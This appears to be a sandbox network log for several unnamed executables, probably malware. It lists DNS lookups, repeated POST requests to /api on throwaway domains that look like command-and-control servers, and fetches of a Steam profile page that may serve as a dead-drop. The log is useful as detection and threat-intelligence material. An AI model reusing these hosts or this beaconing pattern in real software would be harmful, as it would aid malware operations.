                        https://sustainskelet.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        104.21.48.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: sustainskelet.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=cbaeauv41dif5736034p28ladi; expires=Mon, 14 Apr 2025 22:33:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kbw0PUdIzo2K2kmqfPYSCagvkiEYdhpgMRjarald54gJkkWYr086esRjnU%2BfZCIPXTaNRQk7gELCnbwDJFXwBva%2FXPCbiWHYEG%2FBKN2PEaWHEOHRnUi0jOMzIo3TgVrgu554aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd73ffed4141-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49954&min_rtt=48424&rtt_var=12804&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=585&delivery_rate=74380&cwnd=253&unsent_bytes=0&cid=4da649bb2d448688&ts=268&x=0"
                      • flag-us
                        POST
                        https://treehoneyi.click/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.180.113:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: treehoneyi.click
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=qsobb6vbce2dk7hf78f1m4gge3; expires=Mon, 14 Apr 2025 22:33:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K6j5NlGdKycIcn9S4Pza1f28gXwjuaF5Rg39dbLBdZEL1ycjY4S3V5OrrwHqaa6HPrBhdHCEpv5LlzHVp4SWIXNnMi%2Fjc0CVXiG%2Fqazddodf9PzDGfUs0VENPZY33HUK%2Bnb%2B"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd74dfca9547-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=59080&min_rtt=47272&rtt_var=33162&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=75700&cwnd=253&unsent_bytes=0&cid=69f5dd3536d3d1ed&ts=367&x=0"
                      • flag-us
                        DNS
                        crosshuaht.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        crosshuaht.lat
                        IN A
                        Response
                        crosshuaht.lat
                        IN A
                        104.21.52.127
                        crosshuaht.lat
                        IN A
                        172.67.199.59
                      • flag-us
                        POST
                        https://crosshuaht.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        104.21.52.127:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: crosshuaht.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=be9mpjni8pkkgrrqpek2q6g1rk; expires=Mon, 14 Apr 2025 22:33:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEmuUi678qz4eGaZQxVFHDIMetVGBMyA7rXrgnUTLobL5Kym35mhPzxVVkhXoEHzivC0hzljJLgRQanGK9gkaGCVElALlErg7tlIYwi7jbrARTaYCZHgCeRq4amsouIn3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd769f556433-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49824&min_rtt=47484&rtt_var=12763&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=582&delivery_rate=75381&cwnd=253&unsent_bytes=0&cid=c51262a6d4747dd1&ts=268&x=0"
                      • flag-us
                        DNS
                        rapeflowwj.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        rapeflowwj.lat
                        IN A
                        Response
                      • flag-us
                        POST
                        https://discokeyus.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.197.170:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: discokeyus.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:44 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=pfonse583okus0tb86lpg4heai; expires=Mon, 14 Apr 2025 22:33:23 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rNrWFGWYG2KKzLQ%2BntOFvtff6UenpSKgZNG3X90BgZKaohCibSuTxrIxeE%2BDwwxVu83oiVXsqYWMrQj9nq21%2FfE1ghLzZaK%2FJto8ZtS0S02CuZj4EpZdY16LUlzt0NTYBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd859ca8cda1-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49318&min_rtt=47582&rtt_var=12677&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=582&delivery_rate=75448&cwnd=253&unsent_bytes=0&cid=e6138e596e96396b&ts=273&x=0"
                      • flag-us
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                        Response
                        steamcommunity.com
                        IN A
                        23.214.143.155
                      • flag-gb
                        GET
                        https://steamcommunity.com/profiles/76561199724331900
                        823e4bdbcb.exe
                        Remote address:
                        23.214.143.155:443
                        Request
                        GET /profiles/76561199724331900 HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Host: steamcommunity.com
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Content-Type: text/html; charset=UTF-8
                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                        Cache-Control: no-cache
                        Date: Fri, 20 Dec 2024 04:46:44 GMT
                        Content-Length: 25984
                        Connection: keep-alive
                        Set-Cookie: sessionid=22b20c12a81dc2b09e57ceae; Path=/; Secure; SameSite=None
                        Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                      • flag-us
                        POST
                        https://necklacebudi.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.215.121:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: necklacebudi.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:44 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=imujn2o37lvuc0t16fjrtt1vn3; expires=Mon, 14 Apr 2025 22:33:23 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tAUI61A45jQTfanxm97%2BP02cS3bxZJ2YQIjCnNMqsaGU6TCA0ThiOLDUA6t4pc%2FMpHLYJGFO5ipKcYmbkPb4HiNtNeJA2zT3XDO5aUSjm6Vb%2F9JWvJ21LCZ%2Bl3PDCMA6ONGF"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd87e917632b-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49996&min_rtt=47491&rtt_var=12535&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=78601&cwnd=253&unsent_bytes=0&cid=caf528420045451a&ts=268&x=0"
                      • flag-us
                        POST
                        https://energyaffai.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        104.21.64.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: energyaffai.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=73eun6gb635gd499jhhb67tj2b; expires=Mon, 14 Apr 2025 22:33:23 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj7ZkCQf18GKShVxjzl4hP8sSxjrizQ3lQLB0iQX2i4rjmNoBIn8jcT%2FGdLuKTZiIdIlXTZ1C%2FCUx4Qt%2B8oHPJJF2LI0tHUhnoFbr2SD8%2F3wvK6wnqLlU1XVNdgKRriRqjI%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd8a4c9bcdad-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49998&min_rtt=47185&rtt_var=15023&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=583&delivery_rate=73756&cwnd=253&unsent_bytes=0&cid=fbbba66f0d5a847a&ts=280&x=0"
                      • flag-us
                        POST
                        https://aspecteirs.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.157.253:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: aspecteirs.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=llu0qi2g8v8lboen9m1772ddvt; expires=Mon, 14 Apr 2025 22:33:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4KYTfCKqBH4DiyPVjvZqdwCXH5Xqr0lOAMCRWN529J3vr53HcrxZK%2B8Kqiy0cEqO7uKUJiUMt45nrBWPfVzdMztjeeI2I1zIOW2K%2FZj7QUZMHCeCMvzh0kv6hooAWf7PNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd8caa6d6388-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50747&min_rtt=47321&rtt_var=13837&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=582&delivery_rate=74873&cwnd=250&unsent_bytes=0&cid=5878c9e2d432f9ce&ts=290&x=0"
                      • flag-us
                        POST
                        https://sustainskelet.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        104.21.48.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: sustainskelet.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=i0feaq0cp82ai4dmdt3trk8ljn; expires=Mon, 14 Apr 2025 22:33:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4f2APaF6chUI2dyB%2F1OFHlqPW3RmBLi2YJdmsHB7g%2BQW0vRxN4wO02wvBo8Ae0ODinS3Gz9gXfj7qu2ZyDacLVBpUfhvdexuxqxitKHvIHM0sQvt8n8d%2BrQOSWGKuoXed5YEOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd8f0bfb93f2-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50310&min_rtt=48216&rtt_var=12973&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=585&delivery_rate=74524&cwnd=253&unsent_bytes=0&cid=30de6a4b35c0ac1c&ts=270&x=0"
                      • flag-us
                        POST
                        https://crosshuaht.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        104.21.52.127:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: crosshuaht.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=evoppcq68esskokjd9ag41cunq; expires=Mon, 14 Apr 2025 22:33:25 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2F5q2n%2BnfRcxhQ7ijfxM8OvpwZxE14hnwpKp9hxYeDG8txVGR0N7FMhQRffJ%2Ba98%2B%2FNBAR3A6R%2Bzg%2F7Cca%2FDg0yoJy%2BEQ5FbWdQPD1gHGSjn75ac4fRgwRpOBGl1NBpVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd915a03886d-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=48353&min_rtt=46847&rtt_var=12363&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=582&delivery_rate=75407&cwnd=253&unsent_bytes=0&cid=7741eabcfa859a8d&ts=266&x=0"
                      • flag-gb
                        GET
                        https://steamcommunity.com/profiles/76561199724331900
                        fcc74b3f6b.exe
                        Remote address:
                        23.214.143.155:443
                        Request
                        GET /profiles/76561199724331900 HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Host: steamcommunity.com
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Content-Type: text/html; charset=UTF-8
                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                        Cache-Control: no-cache
                        Date: Fri, 20 Dec 2024 04:46:48 GMT
                        Content-Length: 35588
                        Connection: keep-alive
                        Set-Cookie: sessionid=c31e616db9b3b2e8f32c34b5; Path=/; Secure; SameSite=None
                        Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                      • flag-us
                        DNS
                        lev-tolstoi.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        lev-tolstoi.com
                        IN A
                        Response
                        lev-tolstoi.com
                        IN A
                        172.67.157.254
                        lev-tolstoi.com
                        IN A
                        104.21.66.86
                      • flag-us
                        POST
                        https://lev-tolstoi.com/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.157.254:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: lev-tolstoi.com
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=c1h3sn18feam0melj8je0288al; expires=Mon, 14 Apr 2025 22:33:28 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v48jgiFIV27HmOkGte144sW%2F03vFqtYquNtx%2BxwBuRLmukJR1kC%2BfpcagQuL%2Bff92s7SWNClOrTbNvFb1HZLDAkG35kUtE%2BnlM%2BxIxminc7NHVSSo6P4k4ANFoI7hFDy%2BT4%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfda5aba26538-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=48426&min_rtt=47072&rtt_var=11842&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=583&delivery_rate=79564&cwnd=252&unsent_bytes=0&cid=0eddaf907e02d14a&ts=228&x=0"
                      • flag-us
                        DNS
                        cheapptaxysu.click
                        4ab1990554.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        cheapptaxysu.click
                        IN A
                        Response
                        cheapptaxysu.click
                        IN A
                        172.67.177.88
                        cheapptaxysu.click
                        IN A
                        104.21.67.146
                      • flag-us
                        POST
                        https://cheapptaxysu.click/api
                        4ab1990554.exe
                        Remote address:
                        172.67.177.88:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: cheapptaxysu.click
                        Response
                        HTTP/1.1 403 Forbidden
                        Date: Fri, 20 Dec 2024 04:46:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Frame-Options: SAMEORIGIN
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2BlQ6HDHc5p36lLGP55hvQrH3xOAbzY0WwXpA2DQjLUq87HPi75IhOWLSO%2B7MLrGSpIflWDlu%2Bn%2B%2FIQMIlGw6lDkZkz2k2edGlHYuHgT2PkP1bGiYQ2rxZxwATy7kh1kQ5g6laM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfda8abbe419d-LHR
                      • flag-us
                        POST
                        https://cheapptaxysu.click/api
                        4ab1990554.exe
                        Remote address:
                        172.67.177.88:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        Cookie: __cf_mw_byp=CUIqWzdHDLUvip1W0ExWhL1PZSOS3z5eoMrKYPzxAc4-1734670009-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 42
                        Host: cheapptaxysu.click
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=2ce41stjfkcnqgcs3p9plu2m2o; expires=Mon, 14 Apr 2025 22:33:28 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HNEwLzqu%2FlaByZaV6HdZQOslHjRmFvv2WGR8JdrR05jjYk25iYsyQSKVISZs3U4vaPwKKerx29k0kG33XOwYg8hqiLJfmONCaEs3MzGbF5abDKKd%2FUIZvk5JYaMJg76bsB0tfx8%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfda90bf2419d-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=57270&min_rtt=48259&rtt_var=15704&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8133&recv_bytes=1044&delivery_rate=168177&cwnd=257&unsent_bytes=0&cid=0b9d7bf3c6ed5e4a&ts=342&x=0"
                      • flag-us
                        DNS
                        github.com
                        e57707a59c.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        github.com
                        IN A
                        Response
                        github.com
                        IN A
                        20.26.156.215
                      • flag-us
                        DNS
                        httpbin.org
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        httpbin.org
                        IN A
                        Response
                        httpbin.org
                        IN A
                        98.85.100.80
                        httpbin.org
                        IN A
                        34.226.108.155
                      • flag-us
                        DNS
                        httpbin.org
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        httpbin.org
                        IN AAAA
                        Response
                      • flag-us
                        DNS
                        home.twentytk20pn.top
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        home.twentytk20pn.top
                        IN A
                        Response
                        home.twentytk20pn.top
